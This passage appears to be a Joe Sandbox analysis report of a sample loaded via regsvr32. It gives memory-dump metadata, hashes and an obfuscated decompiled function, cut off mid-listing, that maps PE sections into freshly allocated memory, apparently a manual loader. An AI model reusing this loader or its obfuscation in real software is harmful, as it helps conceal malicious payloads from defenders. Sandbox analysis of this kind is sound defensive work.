0x6da28b8f
0x6da28ba4
0x6da28bd1
0x6da28bfe
0x6da28c32
0x6da28c47
0x6da28c74
0x6da28ca1
0x6da28cd5
0x6da28cea
0x6da28d1a
0x6da28d22
0x6da28d2e
0x6da28d5b
0x6da28d6a
0x6da28d84
0x6da28db2
0x6da28dc1
0x6da28ddc
0x6da28ddf
0x6da28df7
0x6da28e0b
0x6da28e20
0x6da28e34
0x6da28e49
0x6da28e5d
0x6da28e72
0x6da28e86
0x6da28ea5
0x6da28ebb
0x6da28ee3
0x6da28ef9
0x6da28f08
0x6da28f24
0x6da28f3a
0x6da28f62
0x6da28f78
0x6da28f87
0x6da28fa3
0x6da28fb9
0x6da28fe1
0x6da28ff7
0x6da29006
0x6da29022
0x6da29038
0x6da29060
0x6da29076
0x6da29085
0x6da290a1
0x6da290b7
0x6da290df
0x6da290f5
0x6da2910b
0x6da2911d
0x6da2915c
0x6da2916b
0x6da2917a
0x6da29189
0x6da291a4
0x6da291e3
0x6da291f2
0x6da29201
0x6da29210
0x6da2922b
0x6da2926a
0x6da29279
0x6da29288
0x6da29297
0x6da292b2
0x6da292f1
0x6da29300
0x6da2930f
0x6da2931e
0x6da29339
0x6da29378
0x6da29387
0x6da29396
0x6da293a5
0x6da293ba
0x6da2889f
0x6da2889f
0x6da293d3

APIs

malloc.MSVCRT ref: 6DA2868D

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: dcbffa6a2de24ff9e7db30056d4c0789d292d17c4835e756b82cdc7525524756
Instruction ID: deb8c7bd426eebba48214e8982a2dd67087da047778501a93180efd0c0002de8
Opcode Fuzzy Hash: dcbffa6a2de24ff9e7db30056d4c0789d292d17c4835e756b82cdc7525524756
Instruction Fuzzy Hash: 14927F7650D3018FCF08DF28CA95B75FBB5B6B7356B85C6298821C62D9E7306027CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 6DA2FBA0 Relevance: 3.7, APIs: 2, Instructions: 1215
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E6DA2FBA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				signed int _t150;
				signed int _t152;
				signed int _t164;
				void* _t166;
				signed int _t168;
				signed int _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t191;
				signed int _t193;
				signed int _t195;
				signed int _t203;
				signed int _t204;
				signed int _t220;
				signed int _t222;
				signed int _t224;
				signed int _t232;
				signed int _t234;
				signed int _t237;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t297;
				signed int _t300;
				signed int _t302;
				signed int _t305;
				signed int _t320;
				signed int _t326;
				signed int _t329;
				signed int _t333;
				signed int _t337;
				signed int _t341;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed int _t352;
				signed int _t356;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t368;
				signed int _t371;
				signed int _t373;
				signed int _t375;
				signed int _t379;
				signed int _t393;
				signed int _t410;
				signed int _t427;
				signed int _t444;
				signed int _t461;
				signed int _t478;
				signed int _t491;
				signed int _t493;
				signed int _t495;
				signed int _t500;
				signed int _t502;
				signed int _t504;
				signed int _t507;
				signed int _t510;
				signed int _t513;
				signed int _t520;
				signed int _t522;
				signed int _t524;
				signed int _t527;
				signed int _t529;
				signed int _t531;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				signed int _t542;
				signed int _t547;
				signed int _t549;
				signed int _t561;
				signed int _t563;
				signed int _t566;
				signed int _t571;
				signed int _t573;
				signed int _t583;
				signed int _t585;
				signed int _t588;
				signed int _t590;
				signed int _t606;
				signed int _t612;
				signed int _t614;
				signed int _t622;
				signed int _t624;
				signed int _t626;
				signed int _t634;
				signed int _t636;
				signed int _t638;
				signed int _t658;
				signed int _t661;
				signed int _t673;
				signed int _t675;
				signed int _t677;
				signed int _t681;
				signed int _t688;
				signed int _t690;
				signed int _t693;
				signed int _t708;
				signed int _t711;
				signed int _t713;
				signed int _t745;
				signed int _t762;
				signed int _t764;
				signed int _t766;
				signed int _t768;
				signed int _t771;
				signed int _t774;
				signed int _t776;
				signed int _t779;
				signed int _t782;
				signed int _t784;
				signed int _t787;
				signed int _t790;
				signed int _t792;
				signed int _t795;
				signed int _t798;
				signed int _t800;
				signed int _t803;
				signed int _t806;
				signed int _t808;
				signed int _t811;
				signed int _t814;
				signed int _t816;
				signed int _t819;
				signed int _t828;
				signed int _t831;
				signed int _t833;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t845;
				signed int _t847;
				signed int _t849;
				signed int _t851;
				signed int _t853;
				signed int _t855;
				signed int _t911;
				signed int _t913;
				signed int _t916;
				signed int _t921;
				signed int _t923;
				signed int _t935;
				signed int _t937;
				signed int _t940;
				signed int _t945;
				signed int _t947;
				signed int _t954;
				signed int _t956;
				signed int _t971;
				signed int _t973;
				signed int _t986;
				signed int _t1000;
				signed int _t1010;
				signed int _t1012;
				signed int _t1014;
				signed int _t1030;
				signed int _t1032;
				signed int _t1034;
				signed int _t1037;
				signed int _t1047;
				signed int _t1049;
				signed int _t1054;
				signed int _t1056;
				signed int _t1058;
				signed int _t1062;
				signed int _t1069;
				signed int _t1072;
				signed int _t1087;
				signed int _t1090;
				signed int _t1092;
				signed int _t1095;
				signed int _t1106;
				signed int _t1107;
				signed int _t1111;
				signed int _t1115;
				signed int _t1118;
				signed int _t1122;
				signed int _t1126;
				signed int _t1129;
				signed int _t1133;
				signed int _t1137;
				signed int _t1140;
				signed int _t1144;
				signed int _t1148;
				signed int _t1150;
				signed int _t1152;
				signed int _t1156;
				signed int _t1176;
				signed int _t1178;
				signed int _t1182;
				signed int _t1186;
				signed int _t1188;
				signed int _t1192;
				signed int _t1196;
				signed int _t1198;
				signed int _t1202;
				signed int _t1206;
				signed int _t1208;
				signed int _t1212;
				signed int _t1216;
				signed int _t1218;
				signed int _t1222;
				signed int _t1226;
				signed int _t1228;
				signed int _t1232;
				void* _t1236;
				void* _t1237;
				void* _t1238;
				void* _t1239;

				_t2 = _a16 + 4; // 0xe90a75c0
				_v20 =  *_t2;
				_t491 =  *0x6da81264; // 0x0
				_t493 =  *0x6da81264; // 0x0
				_t495 =  *0x6da81270; // 0x0
				_t828 =  *0x6da81260; // 0x0
				_t500 =  *0x6da81270; // 0x0
				_t831 =  *0x6da8126c; // 0x0
				_t502 =  *0x6da81264; // 0x0
				_t833 =  *0x6da81264; // 0x0
				_t504 =  *0x6da81268; // 0x0
				_t836 =  *0x6da81270; // 0x0
				_t507 =  *0x6da81264; // 0x0
				_t840 =  *0x6da81270; // 0x0
				_t510 =  *0x6da81270; // 0x0
				_t842 =  *0x6da81264; // 0x0
				_t513 =  *0x6da81270; // 0x0
				_v24 =  *_a16 -  *0x6da81264 -  *0x6da81264 + ( *( *_a16 - _t491 * 0xf8 - _t493 * 0xf8 + 0x14) & 0x0000ffff) + 0x18 - _t495 *  *0x6da8126c *  *0x6da81264 *  *0x6da81270 * 0x28 + _t828 *  *0x6da81268 * 0x28 - _t500 * 0x28 + _t831 * 0x28 + _t502 * 0x28 - _t833 *  *0x6da81270 * 0x28 - _t504 *  *0x6da81264 * 0x28 - _t836 *  *0x6da8125c *  *0x6da8125c * 0x28 - _t507 *  *0x6da8126c * 0x28 - _t840 * 0x28 - _t510 *  *0x6da8125c * 0x28 + _t842 * 0x28 + _t513 *  *0x6da8125c *  *0x6da8125c *  *0x6da81264 *  *0x6da81270 * 0x28;
				_v8 = 0;
				while(1) {
					_t520 =  *0x6da81270; // 0x0
					_t845 =  *0x6da81270; // 0x0
					_t522 =  *0x6da81260; // 0x0
					_t847 =  *0x6da81270; // 0x0
					_t524 =  *0x6da8126c; // 0x0
					_t849 =  *0x6da8126c; // 0x0
					_t527 =  *0x6da81270; // 0x0
					_t851 =  *0x6da81270; // 0x0
					_t529 =  *0x6da81260; // 0x0
					_t853 =  *0x6da81270; // 0x0
					_t531 =  *0x6da8126c; // 0x0
					_t855 =  *0x6da8126c; // 0x0
					if(_v8 >= ( *( *_a16 + 6) & 0x0000ffff) +  *0x6da81264 - _t520 *  *0x6da8126c -  *0x6da81270 + _t845 *  *0x6da81260 - _t522 *  *0x6da8125c +  *0x6da8125c +  *0x6da81270 +  *0x6da8125c -  *0x6da81268 + _t847 *  *0x6da81260 + _t524 *  *0x6da81268 *  *0x6da81260 -  *0x6da81264 +  *0x6da81268 - _t849 *  *0x6da81260 +  *0x6da81264 - _t527 *  *0x6da8126c -  *0x6da81270 + _t851 *  *0x6da81260 - _t529 *  *0x6da8125c +  *0x6da8125c +  *0x6da81270 +  *0x6da8125c -  *0x6da81268 + _t853 *  *0x6da81260 + _t531 *  *0x6da81268 *  *0x6da81260 -  *0x6da81264 +  *0x6da81268 - _t855 *  *0x6da81260) {
						break;
					}
					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
						_t46 = _v24 + 0x14; // 0x558b088b
						_t48 = _v24 + 0x10; // 0xbc458b00
						_t535 =  *0x6da8125c; // 0x0
						_t124 =  *0x6da8125c; // 0x0
						_t537 =  *0x6da8125c; // 0x0
						_t126 =  *0x6da8125c; // 0x0
						_t539 =  *0x6da8125c; // 0x0
						_t128 =  *0x6da81268; // 0x0
						_t542 =  *0x6da81260; // 0x0
						_t911 =  *0x6da81268; // 0x0
						_t547 =  *0x6da8126c; // 0x0
						_t913 =  *0x6da8125c; // 0x0
						_t549 =  *0x6da81268; // 0x0
						_t916 =  *0x6da81260; // 0x0
						_t140 =  *0x6da81268; // 0x0
						_t921 =  *0x6da8126c; // 0x0
						_t142 =  *0x6da8125c; // 0x0
						_t923 =  *0x6da81268; // 0x0
						_t145 =  *0x6da81260; // 0x0
						_t561 =  *0x6da81268; // 0x0
						_t150 =  *0x6da8126c; // 0x0
						_t563 =  *0x6da8125c; // 0x0
						_t152 =  *0x6da81268; // 0x0
						_t566 =  *0x6da81260; // 0x0
						_t935 =  *0x6da81268; // 0x0
						_t571 =  *0x6da8126c; // 0x0
						_t937 =  *0x6da8125c; // 0x0
						_t573 =  *0x6da81268; // 0x0
						_t940 =  *0x6da81260; // 0x0
						_t164 =  *0x6da81268; // 0x0
						_t945 =  *0x6da8126c; // 0x0
						_t166 = E6DA2FAE0(_t573 *  *0x6da8126c *  *0x6da81270 + _t152 *  *0x6da8126c *  *0x6da81270 + _t923 *  *0x6da8126c *  *0x6da81270 + _t549 *  *0x6da8126c *  *0x6da81270 + _t128 *  *0x6da8126c *  *0x6da81270 + _a8 - _t539 *  *0x6da81270 *  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t542 *  *0x6da8125c *  *0x6da81264 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 - _t911 *  *0x6da81260 - _t547 *  *0x6da81264 -  *0x6da81264 - _t913 *  *0x6da81270 *  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t916 *  *0x6da8125c *  *0x6da81264 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 - _t140 *  *0x6da81260 - _t921 *  *0x6da81264 -  *0x6da81264 - _t142 *  *0x6da81270 *  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t145 *  *0x6da8125c *  *0x6da81264 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 - _t561 *  *0x6da81260 - _t150 *  *0x6da81264 -  *0x6da81264 - _t563 *  *0x6da81270 *  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t566 *  *0x6da8125c *  *0x6da81264 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 - _t935 *  *0x6da81260 - _t571 *  *0x6da81264 -  *0x6da81264 - _t937 *  *0x6da81270 *  *0x6da8126c -  *0x6da81268 +  *0x6da8126c + _t940 *  *0x6da8125c *  *0x6da81264 *  *0x6da81268 *  *0x6da8125c -  *0x6da81270 - _t164 *  *0x6da81260 - _t945 *  *0x6da81264 -  *0x6da81264,  *_t46 +  *_t48 -  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da81268 -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 -  *0x6da81260 -  *0x6da81260 + _t535 *  *0x6da81268 -  *0x6da81260 +  *0x6da81270 -  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da81268 -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 -  *0x6da81260 -  *0x6da81260 + _t124 *  *0x6da81268 -  *0x6da81260 +  *0x6da81270 -  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da81268 -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 -  *0x6da81260 -  *0x6da81260 + _t537 *  *0x6da81268 -  *0x6da81260 +  *0x6da81270 -  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da81268 -  *0x6da81268 +  *0x6da81270 +  *0x6da81264 -  *0x6da81260 -  *0x6da81260 + _t126 *  *0x6da81268 -  *0x6da81260 +  *0x6da81270);
						_t1237 = _t1236 + 8;
						if(_t166 != 0) {
							_t51 = _a16 + 0x34; // 0x2b6da812
							_t947 =  *0x6da8125c; // 0x0
							_t168 =  *0x6da81268; // 0x0
							_t583 =  *0x6da81260; // 0x0
							_t954 =  *0x6da81260; // 0x0
							_t585 =  *0x6da8125c; // 0x0
							_t956 =  *0x6da81270; // 0x0
							_t180 =  *0x6da81260; // 0x0
							_t588 =  *0x6da81260; // 0x0
							_t182 =  *0x6da8125c; // 0x0
							_t590 =  *0x6da81270; // 0x0
							_t971 =  *0x6da81260; // 0x0
							_t185 =  *0x6da81260; // 0x0
							_t973 =  *0x6da8125c; // 0x0
							_t187 =  *0x6da81270; // 0x0
							_t53 = _v24 + 0x10; // 0xbc458b00
							_t191 =  *0x6da8126c; // 0x0
							_t606 =  *0x6da81270; // 0x0
							_t986 =  *0x6da81264; // 0x0
							_t193 =  *0x6da8126c; // 0x0
							_t612 =  *0x6da8126c; // 0x0
							_t195 =  *0x6da81270; // 0x0
							_t614 =  *0x6da81264; // 0x0
							_t1000 =  *0x6da8126c; // 0x0
							_t56 = _v24 + 0xc; // 0x1244e9
							_t58 = _a16 + 0x1c; // 0x2b34422b, executed
							_t203 =  *((intOrPtr*)( *_t58))(_v20 +  *_t56, _t614 *  *0x6da81268 + _t195 *  *0x6da81270 + _t986 *  *0x6da81268 + _t606 *  *0x6da81270 +  *_t53 +  *0x6da81260 +  *0x6da81270 +  *0x6da81268 -  *0x6da8126c - _t191 *  *0x6da81268 +  *0x6da81264 +  *0x6da81260 +  *0x6da81260 +  *0x6da8126c +  *0x6da81260 +  *0x6da81260 +  *0x6da81270 - _t193 *  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81270 +  *0x6da81268 -  *0x6da8126c - _t612 *  *0x6da81268 +  *0x6da81264 +  *0x6da81260 +  *0x6da81260 +  *0x6da8126c +  *0x6da81260 +  *0x6da81260 +  *0x6da81270 - _t1000 *  *0x6da81270 -  *0x6da81270, _t187 *  *0x6da81264 + _t590 *  *0x6da81264 + _t956 *  *0x6da81264 + _t168 + 0x1000 - _t583 *  *0x6da81270 +  *0x6da81264 +  *0x6da8125c +  *0x6da81260 +  *0x6da81260 -  *0x6da81268 - _t954 *  *0x6da81264 -  *0x6da8126c + _t585 *  *0x6da81264 *  *0x6da81260 +  *0x6da81270 -  *0x6da81260 +  *0x6da81268 - _t180 *  *0x6da81270 +  *0x6da81264 +  *0x6da8125c +  *0x6da81260 +  *0x6da81260 -  *0x6da81268 - _t588 *  *0x6da81264 -  *0x6da8126c + _t182 *  *0x6da81264 *  *0x6da81260 +  *0x6da81270 -  *0x6da81260 +  *0x6da81268 - _t971 *  *0x6da81270 +  *0x6da81264 +  *0x6da8125c +  *0x6da81260 +  *0x6da81260 -  *0x6da81268 - _t185 *  *0x6da81264 -  *0x6da8126c + _t973 *  *0x6da81264 *  *0x6da81260 +  *0x6da81270 -  *0x6da81260, _t947 + 4 -  *0x6da81264 +  *0x6da8125c -  *0x6da81264 +  *0x6da8125c -  *0x6da81264,  *_t51); // executed
							_t1238 = _t1237 + 0x14;
							_v12 = _t203;
							if(_v12 != 0) {
								_t204 =  *0x6da81264; // 0x0
								_t622 =  *0x6da81270; // 0x0
								_t1010 =  *0x6da81260; // 0x0
								_t624 =  *0x6da81264; // 0x0
								_t1012 =  *0x6da8125c; // 0x0
								_t626 =  *0x6da8126c; // 0x0
								_t1014 =  *0x6da81264; // 0x0
								_t220 =  *0x6da81270; // 0x0
								_t634 =  *0x6da81260; // 0x0
								_t222 =  *0x6da81264; // 0x0
								_t636 =  *0x6da8125c; // 0x0
								_t224 =  *0x6da8126c; // 0x0
								_t638 =  *0x6da81264; // 0x0
								_t1030 =  *0x6da81270; // 0x0
								_t232 =  *0x6da81260; // 0x0
								_t1032 =  *0x6da81264; // 0x0
								_t234 =  *0x6da8125c; // 0x0
								_t1034 =  *0x6da8126c; // 0x0
								_v12 = _t1034 *  *0x6da81260 + _t638 *  *0x6da81260 + _t224 *  *0x6da81260 + _t1014 *  *0x6da81260 + _t626 *  *0x6da81260 + _t204 *  *0x6da81260 + _v20 +  *((intOrPtr*)(_v24 + 0xc)) -  *0x6da81270 +  *0x6da8125c +  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t622 *  *0x6da81260 -  *0x6da81264 + _t1010 *  *0x6da8126c - _t624 *  *0x6da8125c -  *0x6da81260 +  *0x6da81270 + _t1012 *  *0x6da81264 -  *0x6da81268 -  *0x6da8126c +  *0x6da81260 -  *0x6da8126c +  *0x6da81264 -  *0x6da81270 +  *0x6da8125c +  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t220 *  *0x6da81260 -  *0x6da81264 + _t634 *  *0x6da8126c - _t222 *  *0x6da8125c -  *0x6da81260 +  *0x6da81270 + _t636 *  *0x6da81264 -  *0x6da81268 -  *0x6da8126c +  *0x6da81260 -  *0x6da8126c +  *0x6da81264 -  *0x6da81270 +  *0x6da8125c +  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t1030 *  *0x6da81260 -  *0x6da81264 + _t232 *  *0x6da8126c - _t1032 *  *0x6da8125c -  *0x6da81260 +  *0x6da81270 + _t234 *  *0x6da81264 -  *0x6da81268 -  *0x6da8126c +  *0x6da81260 -  *0x6da8126c +  *0x6da81264;
								_t1037 =  *0x6da81264; // 0x0
								_t237 =  *0x6da8126c; // 0x0
								_t658 =  *0x6da8126c; // 0x0
								_t239 =  *0x6da81270; // 0x0
								_t661 =  *0x6da81264; // 0x0
								_t1047 =  *0x6da8126c; // 0x0
								_t244 =  *0x6da8126c; // 0x0
								_t1049 =  *0x6da81270; // 0x0
								_t248 = memcpy(_v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)), _t1049 *  *0x6da8125c + _t661 *  *0x6da8125c + _t239 *  *0x6da8125c + _t1037 *  *0x6da8125c +  *((intOrPtr*)(_v24 + 0x10)) +  *0x6da81268 +  *0x6da8125c +  *0x6da8126c + _t237 *  *0x6da8125c -  *0x6da81260 +  *0x6da8125c -  *0x6da81268 + _t658 *  *0x6da81264 *  *0x6da81260 -  *0x6da8126c +  *0x6da81264 +  *0x6da8125c +  *0x6da8126c + _t1047 *  *0x6da8125c -  *0x6da81260 +  *0x6da8125c -  *0x6da81268 + _t244 *  *0x6da81264 *  *0x6da81260 -  *0x6da8126c +  *0x6da81264 -  *0x6da81268);
								_t1236 = _t1238 + 0xc;
								_t673 =  *0x6da8126c; // 0x0
								_t1054 =  *0x6da8126c; // 0x0
								_t675 =  *0x6da8126c; // 0x0
								_t1056 =  *0x6da8126c; // 0x0
								_t677 =  *0x6da8126c; // 0x0
								_t1058 =  *0x6da8126c; // 0x0
								_t681 =  *0x6da8126c; // 0x0
								_t1062 =  *0x6da8126c; // 0x0
								 *(_v24 + 8) = ((_t248 | 0xffffffff) -  *0x6da81264 + _t673 *  *0x6da8125c -  *0x6da81270 -  *0x6da81270 -  *0x6da81268 -  *0x6da81264 + _t1054 *  *0x6da8125c -  *0x6da81270 -  *0x6da81270 -  *0x6da81268 -  *0x6da81264 + _t675 *  *0x6da8125c -  *0x6da81270 -  *0x6da81270 -  *0x6da81268 -  *0x6da81264 + _t1056 *  *0x6da8125c -  *0x6da81270 -  *0x6da81270 -  *0x6da81268 & _v12) -  *0x6da81260 -  *0x6da81270 +  *0x6da8126c + _t677 *  *0x6da81264 *  *0x6da81270 *  *0x6da81270 -  *0x6da81260 -  *0x6da81270 +  *0x6da8126c + _t1058 *  *0x6da81264 *  *0x6da81270 *  *0x6da81270 -  *0x6da81260 -  *0x6da81270 +  *0x6da8126c + _t681 *  *0x6da81264 *  *0x6da81270 *  *0x6da81270 -  *0x6da81260 -  *0x6da81270 +  *0x6da8126c + _t1062 *  *0x6da81264 *  *0x6da81270 *  *0x6da81270;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t25 = _a16 + 0x34; // 0x2b6da812
					_t1069 =  *0x6da81270; // 0x0
					_t688 =  *0x6da8126c; // 0x0
					_t1072 =  *0x6da81268; // 0x0
					_t297 =  *0x6da81268; // 0x0
					_t690 =  *0x6da81270; // 0x0
					_t300 =  *0x6da8126c; // 0x0
					_t693 =  *0x6da81268; // 0x0
					_t1087 =  *0x6da81268; // 0x0
					_t302 =  *0x6da81270; // 0x0
					_t1090 =  *0x6da8126c; // 0x0
					_t305 =  *0x6da81268; // 0x0
					_t708 =  *0x6da81268; // 0x0
					_t1092 =  *0x6da81270; // 0x0
					_t711 =  *0x6da8126c; // 0x0
					_t1095 =  *0x6da81268; // 0x0
					_t320 =  *0x6da81268; // 0x0
					_t713 =  *0x6da81264; // 0x0
					_t1106 =  *0x6da8126c; // 0x0
					_t27 = _t713 + 0x1000; // 0x1000
					_t1107 =  *0x6da81260; // 0x0
					_t326 =  *0x6da81268; // 0x0
					_t1111 =  *0x6da81270; // 0x0
					_t329 =  *0x6da81260; // 0x0
					_t1115 =  *0x6da81268; // 0x0
					_t333 =  *0x6da81270; // 0x0
					_t1118 =  *0x6da81260; // 0x0
					_t337 =  *0x6da81268; // 0x0
					_t1122 =  *0x6da81270; // 0x0
					_t31 = _v24 + 0xc; // 0x1244e9
					_t1126 =  *0x6da81268; // 0x0
					_t341 =  *0x6da81260; // 0x0
					_t33 = _a16 + 0x1c; // 0x2b34422b
					_t343 =  *((intOrPtr*)( *_t33))(_v20 +  *_t31 - _t1126 *  *0x6da81270 - _t341 *  *0x6da81270, _v16 -  *0x6da8126c - _t1107 *  *0x6da81264 *  *0x6da81260 *  *0x6da81260 + _t326 *  *0x6da81260 *  *0x6da81270 - _t1111 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264 -  *0x6da8126c - _t329 *  *0x6da81264 *  *0x6da81260 *  *0x6da81260 + _t1115 *  *0x6da81260 *  *0x6da81270 - _t333 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264 -  *0x6da8126c - _t1118 *  *0x6da81264 *  *0x6da81260 *  *0x6da81260 + _t337 *  *0x6da81260 *  *0x6da81270 - _t1122 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264, _t1106 + _t27 +  *0x6da8126c +  *0x6da81264, _t1095 *  *0x6da8125c + _t305 *  *0x6da8125c + _t693 *  *0x6da8125c + _t1072 *  *0x6da8125c + 4 - _t1069 *  *0x6da81264 *  *0x6da81264 + _t688 *  *0x6da8126c -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 -  *0x6da81270 -  *0x6da8126c -  *0x6da81264 -  *0x6da8126c - _t297 *  *0x6da8125c *  *0x6da81260 -  *0x6da81270 -  *0x6da81260 - _t690 *  *0x6da81264 *  *0x6da81264 + _t300 *  *0x6da8126c -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 -  *0x6da81270 -  *0x6da8126c -  *0x6da81264 -  *0x6da8126c - _t1087 *  *0x6da8125c *  *0x6da81260 -  *0x6da81270 -  *0x6da81260 - _t302 *  *0x6da81264 *  *0x6da81264 + _t1090 *  *0x6da8126c -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 -  *0x6da81270 -  *0x6da8126c -  *0x6da81264 -  *0x6da8126c - _t708 *  *0x6da8125c *  *0x6da81260 -  *0x6da81270 -  *0x6da81260 - _t1092 *  *0x6da81264 *  *0x6da81264 + _t711 *  *0x6da8126c -  *0x6da8126c +  *0x6da81270 +  *0x6da81260 -  *0x6da81270 -  *0x6da8126c -  *0x6da81264 -  *0x6da8126c - _t320 *  *0x6da8125c *  *0x6da81260 -  *0x6da81270 -  *0x6da81260,  *_t25);
					_t1239 = _t1236 + 0x14;
					_v12 = _t343;
					if(_v12 != 0) {
						_t1129 =  *0x6da81260; // 0x0
						_t345 =  *0x6da81268; // 0x0
						_t1133 =  *0x6da81270; // 0x0
						_t348 =  *0x6da81260; // 0x0
						_t1137 =  *0x6da81268; // 0x0
						_t352 =  *0x6da81270; // 0x0
						_t1140 =  *0x6da81260; // 0x0
						_t356 =  *0x6da81268; // 0x0
						_t1144 =  *0x6da81270; // 0x0
						_t745 = _v20 +  *((intOrPtr*)(_v24 + 0xc)) -  *0x6da8126c - _t1129 *  *0x6da81264 *  *0x6da81260 *  *0x6da81260 + _t345 *  *0x6da81260 *  *0x6da81270 - _t1133 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264 -  *0x6da8126c - _t348 *  *0x6da81264 *  *0x6da81260 *  *0x6da81260 + _t1137 *  *0x6da81260 *  *0x6da81270 - _t352 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264 -  *0x6da8126c - _t1140 *  *0x6da81264 *  *0x6da81260 *  *0x6da81260 + _t356 *  *0x6da81260 *  *0x6da81270 - _t1144 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264;
						_v12 = _t745;
						_t359 =  *0x6da8126c; // 0x0
						_t1148 =  *0x6da81260; // 0x0
						_t361 =  *0x6da81270; // 0x0
						_t1150 =  *0x6da81260; // 0x0
						_t363 =  *0x6da81260; // 0x0
						_t1152 =  *0x6da8126c; // 0x0
						_t365 =  *0x6da8126c; // 0x0
						_t1156 =  *0x6da81270; // 0x0
						_t368 =  *0x6da81270; // 0x0
						_t762 =  *0x6da8126c; // 0x0
						_t371 =  *0x6da81260; // 0x0
						_t764 =  *0x6da81270; // 0x0
						_t373 =  *0x6da81260; // 0x0
						_t766 =  *0x6da81260; // 0x0
						_t375 =  *0x6da8126c; // 0x0
						_t768 =  *0x6da8126c; // 0x0
						_t379 =  *0x6da81270; // 0x0
						_t771 =  *0x6da81270; // 0x0
						 *(_v24 + 8) = _t379 *  *0x6da8126c + _t1156 *  *0x6da8126c + (_t745 | 0xffffffff) - _t359 *  *0x6da81260 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 +  *0x6da8126c - _t1148 *  *0x6da8125c + _t361 *  *0x6da81264 -  *0x6da81260 +  *0x6da81264 +  *0x6da81270 - _t1150 *  *0x6da81268 + _t363 *  *0x6da81270 + _t1152 *  *0x6da8125c *  *0x6da81264 *  *0x6da8126c + _t365 *  *0x6da81264 *  *0x6da81264 +  *0x6da8126c - _t368 *  *0x6da8125c *  *0x6da81260 - _t762 *  *0x6da81260 +  *0x6da81260 -  *0x6da81270 +  *0x6da81260 +  *0x6da8126c - _t371 *  *0x6da8125c + _t764 *  *0x6da81264 -  *0x6da81260 +  *0x6da81264 +  *0x6da81270 - _t373 *  *0x6da81268 + _t766 *  *0x6da81270 + _t375 *  *0x6da8125c *  *0x6da81264 *  *0x6da8126c + _t768 *  *0x6da81264 *  *0x6da81264 +  *0x6da8126c - _t771 *  *0x6da8125c *  *0x6da81260 & _v12;
						_t774 =  *0x6da8126c; // 0x0
						_t1176 =  *0x6da81260; // 0x0
						_t776 =  *0x6da8126c; // 0x0
						_t1178 =  *0x6da8126c; // 0x0
						_t393 =  *0x6da81260; // 0x0
						_t779 =  *0x6da8126c; // 0x0
						_t1182 =  *0x6da81268; // 0x0
						_t782 =  *0x6da8126c; // 0x0
						_t1186 =  *0x6da81260; // 0x0
						_t784 =  *0x6da8126c; // 0x0
						_t1188 =  *0x6da8126c; // 0x0
						_t410 =  *0x6da81260; // 0x0
						_t787 =  *0x6da8126c; // 0x0
						_t1192 =  *0x6da81268; // 0x0
						_t790 =  *0x6da8126c; // 0x0
						_t1196 =  *0x6da81260; // 0x0
						_t792 =  *0x6da8126c; // 0x0
						_t1198 =  *0x6da8126c; // 0x0
						_t427 =  *0x6da81260; // 0x0
						_t795 =  *0x6da8126c; // 0x0
						_t1202 =  *0x6da81268; // 0x0
						_t798 =  *0x6da8126c; // 0x0
						_t1206 =  *0x6da81260; // 0x0
